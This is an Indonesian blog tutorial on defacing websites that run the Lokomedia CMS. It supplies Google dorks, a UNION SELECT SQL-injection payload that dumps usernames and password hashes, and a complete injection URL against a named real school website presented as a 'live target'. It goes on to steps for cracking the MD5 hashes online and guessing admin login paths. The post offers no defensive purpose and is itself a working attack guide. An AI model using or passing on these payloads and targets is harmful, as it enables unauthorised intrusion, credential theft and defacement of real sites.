cara deface poc sql lokomedia
ok welcome guys kali ini saya akan share tutor cara deface poc sql lokomedia
tehnik ini hampir sama seperti sql injection yg sebelmnya saya tulis :V
namun tuor ini lebih simple yak :v
langsung aja deh
tehnik ini hampir sama seperti sql injection yg sebelmnya saya tulis :V
namun tuor ini lebih simple yak :v
langsung aja deh
dork:
- inurl:statis-19-beasiswa.html
- inurl:statis-1/profil.html
- inurl:statis-2/visi-dan-misi.html
exploit:
'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+
1. pertama sperti biasa dorking dahulu,,,
lalu pilihsalah satu webnya.
dan masukan exploitnya di belakang angka.
seperti ini
http://www.sman8malang.sch.id/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+-pengantar.html
dan masukan exploitnya di belakang angka.
seperti ini
http://www.sman8malang.sch.id/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+-pengantar.html
setelah itu silahkan anda tekan CTRL+U atau misalkan anda menggunakan hp
bisa mengetikan view-source: seblum http
lihat di sekitar atas ada kode md5nya kalian bisa hash di https://hashkiller.co.uk/md5-decrypter.aspx
tinggal mencari admin login.
kalian bisa coba coba seperti ini
/administrator.php
/admin.php
/redaktur.php
/adminweb.php
keknya dah cukup ampe sini aja.
entar malah ngajarin yang enggak enggka lagi :v
ok thanks telah mampir :v
live target
http://www.sman8malang.sch.id/statis-1-pengantar.html
Bagikan
Cara deface poc sql lokomedia
4/
5
Oleh
yukino afzan
3 comments
Tulis commentsmaksih telah berkunjung yak om heker :)
Replysaya mencium bau bawang disini
Replyidung onlen :v
Reply